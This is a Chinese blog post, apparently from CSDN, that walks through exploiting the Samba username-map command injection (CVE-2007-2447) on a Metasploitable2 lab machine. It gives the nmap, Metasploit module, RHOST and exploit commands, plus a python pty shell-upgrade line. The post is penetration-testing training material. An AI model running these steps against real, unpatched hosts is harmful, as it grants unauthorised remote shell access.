SambaMS-RPC Shell命令注入漏洞(CVE-2007-2447)

已于 2024-05-12 22:35:14 修改
阅读量419 收藏 7
点赞数 4
分类专栏: Web安全进阶 文章标签: rpc 网络 网络协议
于 2024-05-11 22:55:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/138732308
版权

SambaMS-RPC Shell命令注入漏洞(CVE-2007-2447)

一、介绍

  • Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。
  • SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。
  • SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。

二、原理

  • usermap_script:CVE-2007-2447
  • Samba用户名映射脚本命令执行
  • Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了 /bin/sh 。如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令

三、影响版本

  • Samba版本3.0.20到3.0.25rc3,当使用非默认用户名映射脚本配置选项
  • 通过指定一个用户名包含shell元字符,攻击者可以执行任意命令
  • 不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名

四、复现准备

  1. 靶机:Metasplotable2-Linux - 192.168.9.147
  2. 攻击机:Kali - 192.168.9.148

五、漏洞复现

  1. 使用nmap扫描靶机的IP地址,可以看到靶机的139和445端口开放,且使用了Samba
    在这里插入图片描述

  2. 启动metasploit

msfconsole

在这里插入图片描述

  1. 选择漏洞库
search samba
use exploit/multi/samba/usermap_script

在这里插入图片描述
在这里插入图片描述

  1. 设置参数,

    • 查看需要设置的参数:show options
      在这里插入图片描述

    • 设置要攻击的机器IP:set RHOST 192.168.9.147(可以设置目标端口是445,也可以是139)
      在这里插入图片描述

  2. 开始攻击

exploit

在这里插入图片描述

  1. 利用成功,执行 uname –a 验证
    在这里插入图片描述

  2. 进入交付模式

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

月亮今天也很亮
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CFIX(Samba)服务的使用
心飞扬Q
11-18 786
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。( ---来...
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Samba服务安全漏洞复现及利用[CVE-2007-2447]
sGanYu
09-22 3847
模拟环境: 攻击工具:kali Linux/nmap/msfconsole 目标:metasploittable2/UNIX 一、使用nmap扫描网段内主机 命令:【nmap -sS -Pn 192.168.200.134】 注:-sS会使nmap执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放,-Pn会告知nmap不执行ping命令预先判断目标是否存活,而是默认主机为存活,也可以尝试使用-A选项 MSF内同样也支持nmap扫描,但是这里-sV会进行探测快放端口以及版本信息扫描 .
新手教程—Samba渗透远程命令注入漏洞 username map script(CVE-2007-2447 )
星虐
01-10 2402
Smaba 远程shell命令注入 (username map script) 文章目录Smaba 远程shell命令注入 (username map script)一、漏洞描述二、漏洞利用过程二、漏洞实验步骤 一、漏洞描述 漏洞编号 CVE-2007-2447 披露时间 2007-05-14 “username map script”是Samba协议的远程命令注入执行漏洞 漏洞路径 exploit/multi/samba/usermap_script 影响版本 samba 3.0.20-3.0.25
利用metasploit攻击Linux的CVE-2007-2447漏洞的全过程
最新发布
qq_70584783的博客
06-17 600
利用metasploit攻击Linux的CVE-2007-2447漏洞的全过程
【Linux安装samba】
sinat_23896491的博客
10-12 1571
samba服务器搭建
Ubuntu 安装 Samba 服务器
敖丙007的博客
04-21 1730
Ubuntu 安装 Samba 服务器
linux从服务器获取共享列表失败,Centos下vsftpd提示:连接超时,读取目录列表失败 | linux运维小站–linux系统架构_服务器运维_Linux运维工程师工作手札...
weixin_31523667的博客
04-29 2224
vsftp开启防火墙后发现ftp连接不上提示:错误: 连接超时 错误: 读取目录列表失败解决方法,本文以centos系统为案例,希望能帮到遇到同样问题的朋友。错误提示如下:响应: 227 Entering Passive Mode (192,168,10,16,221,111).命令: LIST错误: 连接超时错误: 读取目录列表失败后来发现在防火墙中规则并没有设置动态端口的规则和ftp pasv...
linux从服务器获取共享列表失败,linux – 如何获取连接到本地网络中NFS服务器的客户端列表?...
weixin_29556943的博客
04-29 721
我有一个具有文件夹权限的NFS服务器,如下所示.有50个客户端需要在同一网络中连接到此服务器.我想知道查找命令的是什么,从服务器访问此服务器的客户端.NFS服务器配置文件如下所示.[root@server ~]# cat /etc/exports/home/guests *(rw,sync)/india *(rw,sync)以下是共享文件夹列表[root@server ~]...
Linux操作系统下SAMBA服务的搭建过程
03-04
SAMBA是局域网上共享文件和打印机的一种协议,能够使Unix与Windows系统之间进行共享服务,使Windows能够采用“网上邻居”进行访问Unix主机。本文介绍了Linux操作系统下SAMBA的最简单搭建过程,目的是有助于快速搭建,入门。
cve2007-2447shell 注入.txt
06-08
samba服务 cve2007-2447shell 注入漏洞exp
如何在Ubuntu上安装与配置Samba
Not Found 404
03-30 4810
Samba安装与配置
Ubuntu 安装Samba教程
cyz141001的博客
03-16 5051
1、安装 Samba 首先安装samba: sudo apt install samba -y 创建共享文件夹:sudo mkdir /home/samba 我们将samba文件夹软链接到桌面:ln -s /home/samba /home/<user>/桌面/ 将创建的文件夹修改权限:sudo chmod 777 /home/samba -R 修改文件:sudo vim /etc/apt/sources.list 在最后面加上下面代码 [samba] comm......
Linux系统samba安装
qq_44521335的博客
06-19 3768
linux samba
【Linux】Samba服务器超详细安装、配置(附带各种问题解决方式)
热门推荐
Yngz_Miao的博客
05-30 24万+
在嵌入式系统开发应用平台中,tftp、nfs和samba服务器是最常用的文件传输工具,tftp和nfs是在嵌入式Linux开发环境中经常使用的传输工具,samba则是Linux和Windows之间的文件传输工具。 samba是模仿Windows网上邻居的SMB的通讯协议,将Linux操作系统“假装成”Windows操作系统,通过网上邻居的方式来进行文件传输的。 虚拟机版本:VMware1...
OpenSSL命令注入漏洞CVE-2022-1292)
07-28
回答: OpenSSL命令注入漏洞CVE-2022-1292)是指在OpenSSL 1.0.2版本中存在的漏洞。为了修复这个漏洞,你需要将OpenSSL 1.0.2升级到SSL 3版本。首先,你可以使用以下命令查看OpenSSL的版本信息:\[1\] ``` openssl version ``` 然后,你可以从OpenSSL官方网站下载SSL 3的升级包。下载地址可以在官方网站上找到。\[2\]你可以使用以下命令下载升级包: ``` wget https://www.openssl.org/source/openssl-3.0.5.tar.gz ``` 下载完成后,解压升级包并进入解压后的目录: ``` tar -zxvf openssl-3.0.5.tar.gz cd openssl-3.0.5/ ``` 接下来,你可以使用以下命令进行编译和安装: ``` ./config shared zlib make make install ``` 在安装之前,建议备份原始文件。安装完成后,你可以添加新的OpenSSL软连接,并将编译后的库文件写入so库配置文件。具体操作可以参考相关文档或官方指南。\[2\] 请注意,升级OpenSSL可能会对系统产生影响,请确保在操作之前备份重要数据,并在升级过程中谨慎操作。 #### 引用[.reference_title] - *1* *2* *3* [openssl 漏洞升级 (CVE-2015-4000/CVE-2022-1292)](https://blog.csdn.net/qq_44637753/article/details/126829820)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值